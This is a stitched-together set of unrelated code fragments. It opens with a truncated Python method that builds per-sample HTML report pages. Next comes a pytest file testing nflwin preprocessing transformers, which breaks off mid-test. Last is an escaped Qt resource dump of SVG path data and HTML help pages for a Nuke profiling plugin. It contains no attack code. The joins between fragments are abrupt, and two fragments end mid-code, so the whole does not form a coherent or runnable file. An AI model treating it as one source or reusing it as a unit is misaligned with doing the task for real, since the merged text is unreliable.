def create_sample_html(self, objs, sample_name, sample_stats, navbar, footer):
"""
Produce an HTML page containing all of a sample's objects
and the sample summary statistics
:param pandas.DataFrame objs: project level dataframe containing
any reported objects for all samples
:param str sample_name: the name of the current sample
:param dict sample_stats: pipeline run statistics for the current sample
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: path to the produced HTML page
"""
html_filename = sample_name + ".html"
html_page = os.path.join(self.reports_dir, html_filename.replace(' ', '_').lower())
sample_page_relpath = os.path.relpath(html_page, self._outdir)
single_sample = _pd.DataFrame() if objs.empty else objs[objs['sample_name'] == sample_name]
if not os.path.exists(os.path.dirname(html_page)):
os.makedirs(os.path.dirname(html_page))
sample_dir = os.path.join(self.prj.results_folder, sample_name)
if os.path.exists(sample_dir):
if single_sample.empty:
# When there is no objects.tsv file, search for the
# presence of log, profile, and command files
log_name = _match_file_for_sample(sample_name, 'log.md', self.prj.results_folder)
profile_name = _match_file_for_sample(sample_name, 'profile.tsv', self.prj.results_folder)
command_name = _match_file_for_sample(sample_name, 'commands.sh', self.prj.results_folder)
else:
log_name = str(single_sample.iloc[0]['annotation']) + "_log.md"
profile_name = str(single_sample.iloc[0]['annotation']) + "_profile.tsv"
command_name = str(single_sample.iloc[0]['annotation']) + "_commands.sh"
stats_name = "stats.tsv"
flag = _get_flags(sample_dir)
# get links to the files
stats_file_path = _get_relpath_to_file(
stats_name, sample_name, self.prj.results_folder, self.reports_dir)
profile_file_path = _get_relpath_to_file(
profile_name, sample_name, self.prj.results_folder, self.reports_dir)
commands_file_path = _get_relpath_to_file(
command_name, sample_name, self.prj.results_folder, self.reports_dir)
log_file_path = _get_relpath_to_file(
| |
<filename>nflwin/tests/test_preprocessing.py
from __future__ import print_function, division
import numpy as np
import pandas as pd
import pytest
from sklearn.utils.validation import NotFittedError
from sklearn.pipeline import Pipeline
from nflwin import preprocessing
class TestPipelines(object):
    """Testing if pipelining cleaning steps works."""

    def test_map_to_int_to_onehot(self):
        # End-to-end: map string categories to ints, then one-hot encode the
        # resulting integer column through a sklearn Pipeline.
        fit_df = pd.DataFrame({"quarter": ["Q1", "Q1", "Q1", "Q2", "Q2"]})
        transform_df = fit_df.copy()
        mti = preprocessing.MapToInt("quarter", copy=True)
        ohe = preprocessing.OneHotEncoderFromDataFrame(
            categorical_feature_names=["quarter"], copy=True)
        pipe = Pipeline(steps=[("one", mti), ("two", ohe)])
        pipe.fit(fit_df)
        output_df = pipe.transform(transform_df)
        expected_df = pd.DataFrame({"onehot_col1": [1.0, 1, 1, 0, 0],
                                    "onehot_col2": [0.0, 0, 0, 1, 1]})
        # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
        pd.testing.assert_frame_equal(output_df, expected_df)
class TestComputeElapsedTime(object):
    """Testing if we can properly map quarters and time elapsed to a total time elapsed."""

    def test_bad_quarter_colname_produces_error(self):
        # A wrong quarter column name surfaces as a KeyError at transform time.
        input_df = pd.DataFrame({"blahblahblah": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                 "time_elapsed": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
        cet.fit(input_df)
        with pytest.raises(KeyError):
            cet.transform(input_df)

    def test_bad_time_elapsed_colname_produces_error(self):
        # A wrong time-elapsed column name also raises KeyError.
        input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                 "blahblahblah": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
        cet.fit(input_df)
        with pytest.raises(KeyError):
            cet.transform(input_df)

    def test_preexisting_output_colname_produces_error(self):
        # The transformer must refuse to overwrite an existing output column.
        input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                 "time_elapsed": [200, 0, 50, 850, 40],
                                 "total_time_elapsed": [0, 0, 0, 0, 0]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
                                               total_time_colname="total_time_elapsed")
        cet.fit(input_df)
        with pytest.raises(KeyError):
            cet.transform(input_df)

    def test_incomplete_quarter_mapping(self):
        # "Q3" is missing from the mapping, which should break the transform.
        input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT1"],
                                 "time_elapsed": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
                                               quarter_to_second_mapping={
                                                   "Q1": 0,
                                                   "Q2": 900,
                                                   "Q4": 2700,
                                                   "OT1": 3600})
        cet.fit(input_df)
        with pytest.raises(TypeError):
            cet.transform(input_df)

    def test_simple_working_case(self):
        # Default mapping: each quarter adds 900s to the in-quarter time.
        input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                 "time_elapsed": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
        cet.fit(input_df)
        transformed_df = cet.transform(input_df)
        expected_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                    "time_elapsed": [200, 0, 50, 850, 40],
                                    "total_elapsed_time": [200, 900, 1850, 3550, 3640]})
        # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
        pd.testing.assert_frame_equal(transformed_df, expected_df)

    def test_inplace_transform(self):
        # With copy=False the input frame itself gains the new column.
        input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                 "time_elapsed": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed", copy=False)
        cet.fit(input_df)
        cet.transform(input_df)
        expected_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
                                    "time_elapsed": [200, 0, 50, 850, 40],
                                    "total_elapsed_time": [200, 900, 1850, 3550, 3640]})
        pd.testing.assert_frame_equal(input_df, expected_df)

    def test_custom_mapping(self):
        # Arbitrary quarter labels work as long as the mapping covers them all.
        input_df = pd.DataFrame({"quarter": ["quarter1", "Q2", "Q3", "Q4", "OT1"],
                                 "time_elapsed": [200, 0, 50, 850, 40]})
        cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
                                               quarter_to_second_mapping={
                                                   "quarter1": 0,
                                                   "Q2": 500,
                                                   "Q3": 1800,
                                                   "Q4": 2700,
                                                   "OT1": 3600})
        cet.fit(input_df)
        transformed_df = cet.transform(input_df)
        expected_df = pd.DataFrame({"quarter": ["quarter1", "Q2", "Q3", "Q4", "OT1"],
                                    "time_elapsed": [200, 0, 50, 850, 40],
                                    "total_elapsed_time": [200, 500, 1850, 3550, 3640]})
        pd.testing.assert_frame_equal(transformed_df, expected_df)
class TestComputeIfOffenseIsHome(object):
    """Testing if we can correctly compute if the offense is the home team."""

    def test_bad_offense_colname_produces_error(self):
        input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                 "blahblahblah": ["a", "b", "a"]})
        ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team")
        ciow.fit(input_df)
        with pytest.raises(KeyError):
            ciow.transform(input_df)

    def test_bad_home_team_colname_produces_error(self):
        input_df = pd.DataFrame({"blahblahblah": ["a", "a", "a"],
                                 "offense_team": ["a", "b", "a"]})
        ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team")
        ciow.fit(input_df)
        with pytest.raises(KeyError):
            ciow.transform(input_df)

    def test_existing_offense_home_team_colname_produces_error(self):
        # The transformer must refuse to overwrite an existing column.
        input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                 "offense_team": ["a", "b", "a"]})
        ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
                                                    offense_home_team_colname="home_team")
        ciow.fit(input_df)
        with pytest.raises(KeyError):
            ciow.transform(input_df)

    def test_correct_answer_with_copy(self):
        # copy=True must leave the input untouched and return the augmented frame.
        input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                 "offense_team": ["a", "b", "a"]})
        expected_input_df = input_df.copy()
        expected_transformed_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                                "offense_team": ["a", "b", "a"],
                                                "offense_home_team": [True, False, True]})
        ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
                                                    offense_home_team_colname="offense_home_team",
                                                    copy=True)
        transformed_df = ciow.transform(input_df)
        # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
        pd.testing.assert_frame_equal(input_df.sort_index(axis=1),
                                      expected_input_df.sort_index(axis=1))
        pd.testing.assert_frame_equal(transformed_df.sort_index(axis=1),
                                      expected_transformed_df.sort_index(axis=1))

    def test_correct_answer_without_copy(self):
        # copy=False augments the input frame in place.
        input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                 "offense_team": ["a", "b", "a"]})
        expected_transformed_df = pd.DataFrame({"home_team": ["a", "a", "a"],
                                                "offense_team": ["a", "b", "a"],
                                                "offense_home_team": [True, False, True]})
        ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
                                                    offense_home_team_colname="offense_home_team",
                                                    copy=False)
        ciow.transform(input_df)
        pd.testing.assert_frame_equal(input_df.sort_index(axis=1),
                                      expected_transformed_df.sort_index(axis=1))
class TestMapToInt(object):
    """Testing if the integer mapper works."""

    def test_fit_bad_colname_produces_error(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("blahblahblah")
        with pytest.raises(KeyError):
            mti.fit(input_df)

    def test_mapping_without_nans(self):
        # Values are numbered in order of first appearance.
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("one")
        mti.fit(input_df)
        expected_output = {"one": 0, "two": 1, "four": 2, "six": 3}
        assert mti.mapping == expected_output

    def test_mapping_with_nans(self):
        # NaN values are skipped when building the mapping.
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", np.nan, "one", "one"]})
        mti = preprocessing.MapToInt("one")
        mti.fit(input_df)
        expected_output = {"one": 0, "two": 1, "four": 2, "six": 3}
        assert mti.mapping == expected_output

    def test_transform_before_fit_produces_error(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("one")
        with pytest.raises(NotFittedError):
            mti.transform(input_df)

    def test_transform_bad_colname_produces_error(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("one")
        mti.fit(input_df)
        transform_df = pd.DataFrame({"blahblahblah": ["one", "two", "one", "four",
                                                      "six", "two", "one", "one"]})
        with pytest.raises(KeyError):
            mti.transform(transform_df)

    def test_transform_without_nans(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("one")
        mti.fit(input_df)
        transformed_df = mti.transform(input_df)
        expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, 0, 0]})
        # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
        pd.testing.assert_frame_equal(transformed_df, expected_df)

    def test_transform_with_nans(self):
        # Unmapped NaNs stay NaN, which upcasts the column to float.
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", np.nan, "one"]})
        mti = preprocessing.MapToInt("one")
        mti.fit(input_df)
        transformed_df = mti.transform(input_df)
        expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, np.nan, 0]})
        pd.testing.assert_frame_equal(transformed_df, expected_df)

    def test_transform_inplace(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        mti = preprocessing.MapToInt("one", copy=False)
        mti.fit(input_df)
        mti.transform(input_df)
        expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, 0, 0]})
        pd.testing.assert_frame_equal(input_df, expected_df)

    def test_transform_copy(self):
        input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
                                         "six", "two", "one", "one"]})
        expected_df = input_df.copy()
        mti = preprocessing.MapToInt("one", copy=True)
        mti.fit(input_df)
        # Return value intentionally unused; the check is that the input survives.
        mti.transform(input_df)
        pd.testing.assert_frame_equal(input_df, expected_df)
class TestOneHotEncoderFromDataFrame(object):
    """Testing if the one-hot encoder wrapper works."""

    def setup_method(self, method):
        self.data = pd.DataFrame({"one": [1, 2, 3, 1],
                                  "two": [2, 2, 2, 5],
                                  "three": [0, 5, 0, 5]})
        # Pin the column order so tests don't depend on dict ordering.
        self.data = self.data[["one", "two", "three"]]

    def test_correct_dtype_passed(self):
        # np.int was removed in NumPy 1.24; it was always an alias of the
        # builtin int, so use int directly.
        ohe = preprocessing.OneHotEncoderFromDataFrame(dtype=int)
        assert ohe.dtype == int

    def test_correct_handle_unknown_string_passed(self):
        ohe = preprocessing.OneHotEncoderFromDataFrame(handle_unknown="ignore")
        assert ohe.handle_unknown == "ignore"

    def test_encode_all_columns(self):
        ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names="all")
        ohe.fit(self.data)
        transformed_data = ohe.transform(self.data)
        expected_data = pd.DataFrame({"onehot_col1": [1., 0, 0, 1],
                                      "onehot_col2": [0., 1, 0, 0],
                                      "onehot_col3": [0., 0, 1, 0],
                                      "onehot_col4": [1., 1, 1, 0],
                                      "onehot_col5": [0., 0, 0, 1],
                                      "onehot_col6": [1., 0, 1, 0],
                                      "onehot_col7": [0., 1, 0, 1]})
        # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
        pd.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
                                      expected_data.sort_index(axis=1))

    def test_encode_some_columns(self):
        ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"])
        ohe.fit(self.data)
        transformed_data = ohe.transform(self.data)
        expected_data = pd.DataFrame({"two": [2, 2, 2, 5],
                                      "onehot_col1": [1., 0, 0, 1],
                                      "onehot_col2": [0., 1, 0, 0],
                                      "onehot_col3": [0., 0, 1, 0],
                                      "onehot_col4": [1., 0, 1, 0],
                                      "onehot_col5": [0., 1, 0, 1]})
        pd.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
                                      expected_data.sort_index(axis=1))

    def test_copy_data_works(self):
        # copy=True must leave self.data unchanged by the transform.
        ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
                                                       copy=True)
        ohe.fit(self.data)
        ohe.transform(self.data)
        expected_data = pd.DataFrame({"one": [1, 2, 3, 1],
                                      "two": [2, 2, 2, 5],
                                      "three": [0, 5, 0, 5]})
        pd.testing.assert_frame_equal(self.data.sort_index(axis=1),
                                      expected_data.sort_index(axis=1))

    def test_inplace_transform_works(self):
        # copy=False mutates self.data in place.
        ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
                                                       copy=False)
        ohe.fit(self.data)
        ohe.transform(self.data)
        expected_data = pd.DataFrame({"two": [2, 2, 2, 5],
                                      "onehot_col1": [1., 0, 0, 1],
                                      "onehot_col2": [0., 1, 0, 0],
                                      "onehot_col3": [0., 0, 1, 0],
                                      "onehot_col4": [1., 0, 1, 0],
                                      "onehot_col5": [0., 1, 0, 1]})
        pd.testing.assert_frame_equal(self.data.sort_index(axis=1),
                                      expected_data.sort_index(axis=1))

    def test_encoding_subset_columns(self):
        # Fitting on a row subset should preserve the original index in the output.
        ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
                                                       copy=True)
        shifted_data = self.data[2:]
        ohe.fit(shifted_data)
        transformed_data = ohe.transform(shifted_data)
        self.data = pd.DataFrame({"one": [1, 2, 3, 1],
                                  "two": [2, 2, 2, 5],
                                  "three": [0, 5, 0, 5]})
        expected_data = pd.DataFrame({"two": [2, 5],
                                      "onehot_col1": [0., 1],
                                      "onehot_col2": [1., 0],
                                      "onehot_col3": [1., 0],
                                      "onehot_col4": [0., 1]},
                                     index=[2, 3])
        pd.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
                                      expected_data.sort_index(axis=1))
class TestCreateScoreDifferential(object):
"""Testing if score differentials are properly created."""
def test_bad_home_score_colname(self):
    # A home-score column that is absent from the frame must raise KeyError.
    frame = pd.DataFrame({"home_score": [1, 2, 3, 4],
                          "away_score": [10, 0, 5, 15],
                          "offense_home": [True, True, True, True]})
    csd = preprocessing.CreateScoreDifferential("badcol", "away_score",
                                                "offense_home")
    with pytest.raises(KeyError):
        csd.transform(frame)
def test_bad_away_score_colname(self):
    # An away-score column that is absent from the frame must raise KeyError.
    frame = pd.DataFrame({"home_score": [1, 2, 3, 4],
                          "away_score": [10, 0, 5, 15],
                          "offense_home": [True, True, True, True]})
    csd = preprocessing.CreateScoreDifferential("home_score", "badcol",
                                                "offense_home")
    with pytest.raises(KeyError):
        csd.fit(frame)
        csd.transform(frame)
def test_bad_offense_home_colname(self):
    # An offense-home column that is absent from the frame must raise KeyError.
    frame = pd.DataFrame({"home_score": [1, 2, 3, 4],
                          "away_score": [10, 0, 5, 15],
                          "offense_home": [True, True, True, True]})
    csd = preprocessing.CreateScoreDifferential("home_score", "away_score",
                                                "badcol")
    with pytest.raises(KeyError):
        csd.fit(frame)
        csd.transform(frame)
def test_differential_column_already_exists(self):
    # Refuse to overwrite an output column that is already in the frame.
    frame = pd.DataFrame({"home_score": [1, 2, 3, 4],
                          "away_score": [10, 0, 5, 15],
                          "offense_home": [True, True, True, True],
                          "used_col": [0, 0, 0, 0]})
    csd = preprocessing.CreateScoreDifferential("home_score",
                                                "away_score",
                                                "offense_home",
                                                score_differential_colname="used_col")
    with pytest.raises(KeyError):
        csd.fit(frame)
        csd.transform(frame)
def test_differential_works_offense_is_home(self):
    """score_diff must equal home - away when the offense is the home team."""
    csd = preprocessing.CreateScoreDifferential("home_score",
                                                "away_score",
                                                "offense_home",
                                                score_differential_colname="score_diff")
    input_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
                               "away_score": [10, 0, 5, 15],
                               "offense_home": [True, True, True, True]})
    expected_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
                                  "away_score": [10, 0, 5, 15],
                                  "offense_home": [True, True, True, True],
                                  "score_diff": [-9, 2, -2, -11]})
    csd.fit(input_data)
    transformed_data = csd.transform(input_data)
    # pd.util.testing was removed in pandas 2.0; pd.testing is the public API.
    pd.testing.assert_frame_equal(expected_data.sort_index(axis=1),
                                  transformed_data.sort_index(axis=1))
def test_differential_works_offense_is_away(self):
csd = preprocessing.CreateScoreDifferential("home_score",
"away_score",
"offense_home",
score_differential_colname="score_diff")
input_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [False, False, False, False]})
expected_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [False, False, False, False],
"score_diff": [9, -2, 2, 11]})
csd.fit(input_data)
| |
2.09\
546C2.81988 2.80\
969 1.98679 3.82\
485 1.49482 5.01\
257C1.00285 6.20\
029 0.874083 7.5\
0719 1.12489 8.7\
6807C1.37569 10.\
0289 1.99478 11.\
1872 2.90382 12.\
0962C3.81286 13.\
0052 4.97107 13.\
6243 6.23194 13.\
8751C7.49282 14.\
1259 8.79972 13.\
9972 9.98744 13.\
5052C11.1752 13.\
0133 12.1903 12.\
1801 12.9045 11.\
1112C13.6188 10.\
0423 14 8.78558 \
14 7.5C14 5.7760\
9 13.3152 4.1228\
12.0962 2.90381\
C10.8772 1.68482\
9.22392 1 7.500\
01 1ZM7.50001 13\
C6.41221 13 5.34\
881 12.6775 4.44\
434 12.0731C3.53\
987 11.4688 2.83\
493 10.6097 2.41\
865 9.60474C2.00\
237 8.59974 1.89\
344 7.4939 2.105\
66 6.427C2.31788\
5.36011 2.84172\
4.38015 3.61091\
3.61096C4.3801 \
2.84177 5.36012 \
2.31793 6.42701 \
2.10571C7.49391 \
1.89349 8.59975 \
2.00242 9.60474 \
2.4187C10.6097 2\
.83498 11.4687 3\
.53987 12.0731 4\
.44434C12.6774 5\
.34881 13 6.4122\
13 7.5C13 8.958\
69 12.4206 10.35\
76 11.3891 11.38\
9C10.3577 12.420\
5 8.9587 13 7.50\
001 13ZM9.04999 \
4.57994C8.87722 \
4.40004 8.6697 4\
.25723 8.44 4.16\
002C8.151 4.0443\
1 7.84117 3.9897\
9 7.53003 3.9999\
9C7.22804 3.9945\
6.92825 4.05246\
6.65002 4.17003\
C6.41146 4.27028\
6.19928 4.42423\
6.03003 4.61998\
C5.86442 4.8001 \
5.73536 5.01066 \
5.65002 5.23998C\
5.57068 5.47292 \
5.52028 5.7147 5\
.5 5.95995H6.729\
98C6.73725 5.744\
94 6.82673 5.540\
98 6.97998 5.39C\
7.05193 5.31511 \
7.13924 5.25671 \
7.2359 5.21874C7\
.33256 5.18076 7\
.43629 5.16414 7\
.53998 5.17003C7\
.62942 5.15581 7\
.72056 5.15581 7\
.81 5.17003C7.89\
216 5.2011 7.967\
08 5.24877 8.030\
03 5.31004C8.099\
5 5.37016 8.1542\
2 5.4454 8.19 5.\
53001C8.23097 5.\
62465 8.25141 5.\
72683 8.25 5.829\
94C8.25037 6.002\
65 8.21283 6.173\
33 8.14001 6.329\
94C8.06739 6.492\
83 7.97681 6.647\
2 7.87 6.79002L7\
.52002 7.20995C7\
.40002 7.33995 7\
.27998 7.47998 7\
.16998 7.61998C7\
.06332 7.75933 6\
.97279 7.91024 6\
.90002 8.06993C6\
.83065 8.22732 6\
.79648 8.39797 6\
.79999 8.56993V9\
.22997H8V8.73998\
C8.00339 8.59331\
8.04105 8.44943\
8.10999 8.31993\
C8.19183 8.17576\
8.28551 8.03871\
8.39001 7.91002\
L8.75 7.46996C8.\
88106 7.31855 9.\
00134 7.15818 9.\
10999 6.98998C9.\
22491 6.81846 9.\
31894 6.63376 9.\
39001 6.43993C9.\
46294 6.23444 9.\
50013 6.01808 9.\
5 5.80003C9.5017\
8 5.57285 9.4680\
7 5.34675 9.4000\
2 5.12999C9.3245\
1 4.9235 9.20506\
4.7358 9.04999 \
4.57994ZM6.8 9.8\
2996H7.97V11H6.8\
V9.82996Z\x22 fill=\
\x22#C5C5C5\x22/>\x0a</sv\
g>\x0a\
\x00\x00\x03\xba\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
Frames</h1>\x0a \
<p>Set the frame\
range for the t\
able view.</p>\x0a \
<p>When the t\
able is docked i\
nside Nuke main \
window, is likel\
y that there wil\
l not be\x0a \
much screen spa\
ce to display to\
ns of frames, so\
the default fra\
me range is set \
to 10. <br>\x0a \
But because \
the window can b\
e docked (and ma\
ximize on a diff\
erent monitor fo\
r example),\x0a \
you could en\
able the custom \
frame range and \
set your own.\x0a \
</p>\x0a <p>\x0a \
The secti\
on also shows wh\
ich node is the \
\x22heaviest\x22 (for \
each call type) \
for the given fr\
ame range.\x0a <\
/p>\x0a\x0a <dl>\x0a \
<dt><b>Max\
Call</b></dt>\x0a \
<dd>Node \
with the highest\
callCount from \
the given frame \
range</dd>\x0a\x0a \
<dt><b>Max C\
PU</b></dt>\x0a \
<dd>Node wit\
h the highest ti\
meTakenCPU from \
the given frame \
range</dd>\x0a\x0a \
<dt><b>Max W\
all</b></dt>\x0a \
<dd>Node wi\
th the highest t\
imeTakenWall fro\
m the given fram\
e range</dd>\x0a \
</dl>\x0a\x0a\x0a</body>\
\x0a\x0a</html>\
\x00\x00\x02o\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a\x0a <h1\
>Refresh Table</\
h1>\x0a <p>\x0a \
The main fun\
ctionality of th\
is button is to \
take a \x22snapshot\
\x22 of the current\
state and save \
it into the tabl\
e.\x0a (e.g \
when adding or d\
eleting nodes, t\
he table must be\
updated in orde\
r to reflect the\
changes).\x0a <\
/p>\x0a <p>\x0a \
When the pro\
filing listener \
is activated, by\
refreshing the \
table, you will \
also save the cu\
rrent timings st\
ate.\x0a <br\
>\x0a This m\
eans that you ca\
n stop the profi\
ling listener in\
Nuke (so to sav\
e some cpu resou\
rces) but still \
be able to\x0a \
inspect the l\
ast timings valu\
es.\x0a </p>\x0a\x0a</\
body>\x0a\x0a</html>\
\x00\x00\x03\x8b\
<\
!DOCTYPE html>\x0a<\
html>\x0a\x0a<body>\x0a \
<h1>Live Updat\
es</h1>\x0a\x0a <bl\
ockquote>\x0a \
The purpose of\
this section is\
explained in mo\
re details on th\
e readme.\x0a </\
blockquote>\x0a\x0a \
<p>Enable/Disab\
le live update.<\
/p>\x0a\x0a <dl>\x0a \
<dt><b>Ena\
ble:</b></dt>\x0a \
<dd>Enable\
/Disable live up\
date</dd>\x0a \
<dt><b>Update \
by:</b></dt>\x0a \
<dd>Chose b\
y which method t\
he updates will \
be made (<i>info\
on the official\
documentation</\
i>)\x0a \
<ul>\x0a \
<li>\x0a \
<b\
>updateUI</b>\x0a \
\
- These are ru\
n on every node \
after any change\
s to the script.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>knobChanged</\
b>\x0a \
- These a\
re executed when\
the user change\
s the value of a\
ny knob when the\
\x0a \
control pan\
el is open.\x0a \
</li\
>\x0a </\
ul>\x0a </dd\
>\x0a </dt>\x0a\
</dl>\x0a</body\
>\x0a\x0a</html>\
\x00\x00\x07\x16\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
XML Report Table\
</h1>\x0a <p>Tab\
le that displays\
the xml report \
file that Nuke g\
enerates. To ope\
n a file, use th\
e <b>Open File</\
b> button on\x0a \
the toolbar\
.</p>\x0a <p>\x0a \
Each colum\
is a frame and \
on each row you \
will find the no\
de name.\x0a \
Because some no\
des could have l\
ong names, by ho\
vering over a ro\
w, a tooltip\x0a \
will appear\
displaying the \
entire name.\x0a \
</p>\x0a\x0a <p>\x0a \
The table\
offers a the sa\
me search bar th\
at is found on t\
he Dag page, so \
the same\x0a \
features are av\
ailable here; fi\
lter nodes using\
regex, filter b\
y name, class et\
c.\x0a </p>\x0a\x0a \
<h2>Need To Kno\
b</h2>\x0a <p>\x0a \
When load\
ing a xml file, \
the plugin will \
try to verify th\
at is a valid xm\
l file before lo\
ading;\x0a t\
hat is, will try\
to check for sy\
ntax errors, and\
if is a valid N\
uke profiling fi\
le. <br>\x0a \
When one or the\
other is not co\
rrect, the plugi\
n will give an a\
lert message wit\
h some indicatio\
n on how to fix\x0a\
it (e.g.\
missing closing\
tag).\x0a </p>\x0a\
<p>\x0a \
Also keep in min\
d that, if you a\
re trying to loa\
d an xml file th\
at just be gener\
ated form Nuke,\x0a\
remember\
that, You must \
close the Nuke a\
pp in order for \
the file to be c\
ompleted.\x0a </\
p>\x0a\x0a\x0a <h2>Un-\
dock Window</h2>\
\x0a\x0a <p>\x0a \
The entire tab\
le can be un-doc\
ked from the Nuk\
e main window.\x0a \
<br>\x0a \
This can be \
done in two ways\
;\x0a <ul>\x0a \
<li>By double\
clicking on the\
window title ba\
r</li>\x0a <\
li>By clicking o\
n the un-dock ic\
on.</li>\x0a </u\
l>\x0a\x0a You can \
dock back the wi\
ndow in the same\
way,\x0a double\
-clicking on the\
title bar or cl\
ick on the close\
icon.\x0a </p>\x0a\
\x0a <h2>Order/S\
ort</h2>\x0a <p>\
\x0a The tab\
le allows to sor\
t columns in asc\
ending or descen\
ding order by cl\
icking on a colu\
mn header.\x0a <\
/p>\x0a\x0a</body>\x0a\x0a</\
html>\
\x00\x00\x09\xb6\
<\
html lang=\x22en\x22>\x0a\
\x0a<body>\x0a <h1>\
Timings</h1>\x0a \
<hr>\x0a <block\
quote>\x0a <\
b>NOTE:</b> The \
values will be c\
hanged only insi\
de the table.\x0a \
The DAG va\
lues will always\
be set to <b>En\
gine</b> and <b>\
ms</b>. <br>\x0a \
Also, most \
of the descripti\
ons are from the\
official docume\
ntation so\x0a \
please refer \
to it for a more\
in depth explan\
ation.\x0a </blo\
ckquote>\x0a <hr\
>\x0a\x0a <p>Change\
the timings for\
mat shown in the\
table.</p>\x0a\x0a \
<dl>\x0a <d\
t><b>Profiling t\
ype:</b></dt>\x0a \
<dd>\x0a \
Change th\
e profiling type\
.\x0a <u\
l>\x0a \
<li>\x0a \
<b>s\
tore</b> - store\
the values the \
user has selecte\
d on its knobs.\x0a\
\
</li>\x0a \
<li>\x0a \
<\
b>validate</b> -\
this is where t\
he node tells Nu\
ke about the out\
put it produces.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>request</b> -\
his is where th\
e node works out\
what data it\x0a \
\
will need from\
its inputs in o\
rder to produce \
its output\x0a \
</li>\
\x0a \
<li>\x0a \
<b>eng\
ine</b> - this i\
s where the node\
does most of it\
s work, and actu\
ally generates i\
ts output.\x0a \
</li>\
\x0a </u\
l>\x0a\x0a </dd\
>\x0a <dt><b\
>Call type: <b>(\
Not present in D\
AG Inspector)</b\
></b></dt>\x0a \
<dd>Change th\
e call type insi\
de the table.\x0a \
<ul>\x0a \
<\
li>\x0a \
<b>callC\
ount</b> - tells\
you the number \
of times this pa\
rt of the proces\
sing has been ca\
lled.\x0a \
</li>\x0a \
<li>\
\x0a \
<b>timeTake\
nWall</b> - is t\
he time taken as\
it would be mea\
sured by a clock\
on the wall,\x0a \
\
i.e. the actua\
l time a user wo\
uld have to wait\
for the process\
ing to complete.\
\x0a \
</li>\x0a \
<li>\x0a \
\
<b>timeTakenCPU<\
/b> - On Linux, \
this is the time\
the CPU spent e\
xecuting the pro\
cessing code,\x0a \
\
On Mac and Win\
dows, the CPU ti\
me is not curren\
tly available.\x0a \
<\
/li>\x0a \
</ul>\x0a <\
/dd>\x0a <dt\
><b>Timings form\
at:</b></dt>\x0a \
<dd>Convert\
the current tim\
ings from millis\
